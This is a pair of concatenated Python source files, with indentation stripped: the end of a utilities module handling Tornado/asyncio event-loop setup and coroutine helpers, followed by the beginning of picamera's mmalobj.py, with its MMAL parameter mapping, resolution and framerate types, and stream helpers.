for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if 'asyncio' in sys.modules and tornado.version_info[0] >= 5:
jupyter_event_loop_initialized = False
if 'notebook' in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
jupyter_event_loop_initialized = (
traitlets.config.Application.initialized() and
isinstance(traitlets.config.Application.instance(), NotebookApp)
)
if not jupyter_event_loop_initialized:
import asyncio
import tornado.platform.asyncio
asyncio.set_event_loop_policy(tornado.platform.asyncio.AnyThreadEventLoopPolicy())
def has_keyword(func, keyword):
if PY3:
return keyword in inspect.signature(func).parameters
else:
# https://stackoverflow.com/questions/50100498/determine-keywords-of-a-tornado-coroutine
if gen.is_coroutine_function(func):
func = func.__wrapped__
return keyword in inspect.getargspec(func).args
if lru_cache:
has_keyword = lru_cache(1000)(has_keyword)
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = ['#440154', '#471669', '#472A79', '#433C84', '#3C4D8A', '#355D8C',
'#2E6C8E', '#287A8E', '#23898D', '#1E978A', '#20A585', '#2EB27C',
'#45BF6F', '#64CB5D', '#88D547', '#AFDC2E', '#D7E219', '#FDE724']
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
|
mmalobj.py
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANALOG_GAIN: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BLACK_LEVEL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CCM_SHIFT: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
# mmal.MMAL_PARAMETER_CROP: mmal.MMAL_PARAMETER_CROP_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
# mmal.MMAL_PARAMETER_CUSTOM_CCM: mmal.MMAL_PARAMETER_CUSTOM_CCM_T,
mmal.MMAL_PARAMETER_DIGITAL_GAIN: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LENS_SHADING_OVERRIDE: mmal.MMAL_PARAMETER_LENS_SHADING_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_OUTPUT_SHIFT: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
# mmal.MMAL_PARAMETER_RESIZE_PARAMS: mmal.MMAL_PARAMETER_RESIZE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
}
class PiCameraFraction(Fraction):
"""
Extends :class:`~fractions.Fraction` to act as a (numerator, denominator)
tuple when required.
"""
def __len__(self):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
return 2
def __getitem__(self, index):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
if index == 0:
return self.numerator
elif index == 1:
return self.denominator
else:
raise IndexError('invalid index %d' % index)
def __contains__(self, value):
return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
"""
A :func:`~collections.namedtuple` derivative which represents a resolution
with a :attr:`width` and :attr:`height`.
.. attribute:: width
The width of the resolution in pixels
.. attribute:: height
The height of the resolution in pixels
.. versionadded:: 1.11
"""
__slots__ = () # workaround python issue #24931
def pad(self, width=32, height=16):
"""
Returns the resolution padded up to the nearest multiple of *width*
and *height* which default to 32 and 16 respectively (the camera's
native block size for most operations). For example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).pad()
PiResolution(width=1920, height=1088)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=128, height=112)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=112, height=112)
"""
return PiResolution(
width=((self.width + (width - 1)) // width) * width,
height=((self.height + (height - 1)) // height) * height,
)
def transpose(self):
"""
Returns the resolution with the width and height transposed. For
example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).transpose()
PiResolution(width=1080, height=1920)
"""
return PiResolution(self.height, self.width)
def __str__(self):
return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the low and high limits of a range of framerates. It is recommended that
you access the information stored by this class by attribute rather than
position (for example: ``camera.framerate_range.low`` rather than
``camera.framerate_range[0]``).
.. attribute:: low
The lowest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. attribute:: high
The highest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. versionadded:: 1.13
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, low, high):
return super(PiFramerateRange, cls).__new__(cls, to_fraction(low),
to_fraction(high))
def __str__(self):
return '%s..%s' % (self.low, self.high)
class PiSensorMode(namedtuple('PiSensorMode', ('resolution', 'framerates',
'video', 'still', 'full_fov'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the attributes describing a camera sensor mode.
.. attribute:: resolution
A :class:`PiResolution` specifying the size of frames output by the
camera in this mode.
.. attribute:: framerates
A :class:`PiFramerateRange` specifying the minimum and maximum
framerates supported by this sensor mode. Typically the low value is
exclusive and high value inclusive.
.. attribute:: video
A :class:`bool` indicating whether or not the mode is capable of
recording video. Currently this is always ``True``.
.. attribute:: still
A :class:`bool` indicating whether the mode can be used for still
captures (cases where a capture method is called with
``use_video_port`` set to ``False``).
.. attribute:: full_fov
A :class:`bool` indicating whether the full width of the sensor
area is used to capture frames. This can be ``True`` even when the
resolution is less than the camera's maximum resolution due to binning
and skipping. See :ref:`camera_modes` for a diagram of the available
fields of view.
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, resolution, framerates, video=True, still=False,
full_fov=True):
return super(PiSensorMode, cls).__new__(
cls,
resolution
if isinstance(resolution, PiResolution) else
to_resolution(resolution),
framerates
if isinstance(framerates, PiFramerateRange) else
PiFramerateRange(*framerates),
video, still, full_fov)
def open_stream(stream, output=True, buffering=65536):
"""
This is the core of picamera's IO-semantics. It returns a tuple of a
file-like object and a bool indicating whether the stream requires closing
once the caller is finished with it.
* If *stream* is a string, it is opened as a file object (with mode 'wb' if
*output* is ``True``, and the specified amount of *bufffering*). In this
case the function returns ``(stream, True)``.
* If *stream* is a stream with a ``write`` method, it is returned as
``(stream, False)``.
* Otherwise *stream* is assumed to be a writeable buffer and is wrapped
with :class:`BufferIO`. The function returns ``(stream, True)``.
"""
if isinstance(stream, bytes):
stream = stream.decode('ascii')
opened = isinstance(stream, str)
if opened:
stream = io.open(stream, 'wb' if output else 'rb', buffering)
else:
try:
if output:
stream.write
else:
stream.read
except AttributeError:
# Assume the stream is actually a buffer
opened = True
stream = BufferIO(stream)
if output and not stream.writable:
raise IOError('writeable buffer required for output')
return (stream, opened)
def close_stream(stream, opened):
"""
If *opened* is ``True``, then the ``close`` method of *stream* will be
called. Otherwise, the function will attempt to call the ``flush`` method
on *stream* (if one exists). This function essentially takes the output
of :func:`open_stream` and finalizes the result.
"""
if opened:
stream.close()
else:
try:
stream.flush()
except AttributeError:
pass
def to_resolution(value):
"""
Converts *value* which may be a (width, height) tuple or a string
containing a representation of a resolution (e.g. "1024x768" or "1080p") to
a (width, height) tuple.
"""
if isinstance(value, bytes):
value = value.decode('utf-8')
if isinstance(value, str):
try:
# A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
# Feel free to suggest additions
w, h = {
'VGA': (640, 480),
'SVGA': (800, 600),
'XGA': (1024, 768),
'SXGA': (1280, 1024),
'UXGA': (1600, 1200),
'HD': (1280, 720),
'FHD': (1920, 1080),
'1080P': (1920, 1080),
'720P': (1280, 720),
}[value.strip().upper()]
except KeyError:
w, h = (int(i.strip()) for i in value.upper().split('X', 1))
else:
try:
w, h = value
except (TypeError, ValueError):
raise PiCameraValueError("Invalid resolution tuple: %r" % value)
return PiResolution(w, h)
def to_fraction(value, den_limit=65536):
"""
Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
(numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
the denominator to the range 0 < n <= *den_limit* (which defaults to
65536).
"""
try:
# int, long, or fraction
n, d = value.numerator, value.denominator
except AttributeError:
try:
# float
n, d = value.as_integer_ratio()
except AttributeError:
try:
n, d = value.num, value.den
except AttributeError:
try:
# tuple
n, d = value
warnings.warn(
PiCameraDeprecated(
"Setting framerate or gains as a tuple is "
"deprecated; please use one of Python's many "
"numeric classes like int, float, Decimal, or "
"Fraction instead"))
except (TypeError, ValueError):
# try and convert anything else to a Fraction directly
value = Fraction(value)
n, d = value.numerator, value.denominator
# Ensure denominator is reasonable
if d == 0:
raise PiCameraValueError("Denominator cannot be 0")
elif d > den_limit:
return Fraction(n, d).limit_denominator(den_limit)
else:
return Fraction(n, d)
def to_rational(value):
"""
Converts *value* (which can be anything accepted by :func:`to_fraction`) to
an MMAL_RATIONAL_T structure.
"""
value = to_fraction(value)
return mmal.MMAL_RATIONAL_T(value.numerator, value.denominator)
def buffer_bytes(buf):
"""
Given an object which implements the :ref:`buffer protocol
<bufferobjects>`, this function returns the size of the object in bytes.
The object can be multi-dimensional or include items larger than byte-size.
"""
if not isinstance(buf, memoryview):
buf = memoryview(buf)
return buf.itemsize * reduce(mul, buf.shape)
def debug_pipeline(port):
"""
Given an :class:`MMALVideoPort` *port*, this traces all objects in the
pipeline feeding it (including components and connections) and yields each
object in turn. Hence the generator typically yields something like:
* :class:`MMALVideoPort` (the specified output port)
* :class:`MMALEncoder` (the encoder which owns the output port)
* :class:`MMALVideoPort` (the encoder's input port)
* :class:`MMALConnection` (the connection between the splitter and encoder)
* :class:`MMALVideoPort` (the splitter's output port)
* :class:`MMALSplitter` (the splitter on the camera's video port)
* :class:`MMALVideoPort` (the splitter's input port)
* :class:`MMALConnection` (the connection between the splitter and camera)
* :class:`MMALVideoPort` (the camera's video port)
* :class:`MMALCamera` (the camera component)
"""
def find_port(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALControlPort):
if ct.addressof(obj._port[0]) == addr:
return obj
raise IndexError('unable to locate port with address %x' % addr)
def find_component(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALBaseComponent) and obj._component is not None:
if ct.addressof(obj._component[0]) == addr:
return obj
raise IndexError('unable to locate component with address %x' % addr)
assert isinstance(port, (MMALControlPort, MMALPythonPort))
while True:
if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
yield port
if isinstance(port, MMALPythonPort):
comp = port._owner()
else:
comp = find_component(ct.addressof(port._port[0].component[0]))
yield comp
if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
break
if comp.connection is None:
break
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._target
else:
port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
yield port
yield comp.connection
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._source
else:
port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
"""
Prints a human readable representation of the pipeline feeding the
specified :class:`MMALVideoPort` *port*.
"""
rows = [[], [], [], [], [], []]
under_comp = False
for obj in reversed(list(debug_pipeline(port))):
if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
rows[0].append(obj.name)
under_comp = True
elif isinstance(obj, MMALVideoPort):
rows[0].append('[%d]' % obj._port[0].index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
if under_comp:
rows[2].append('buf')
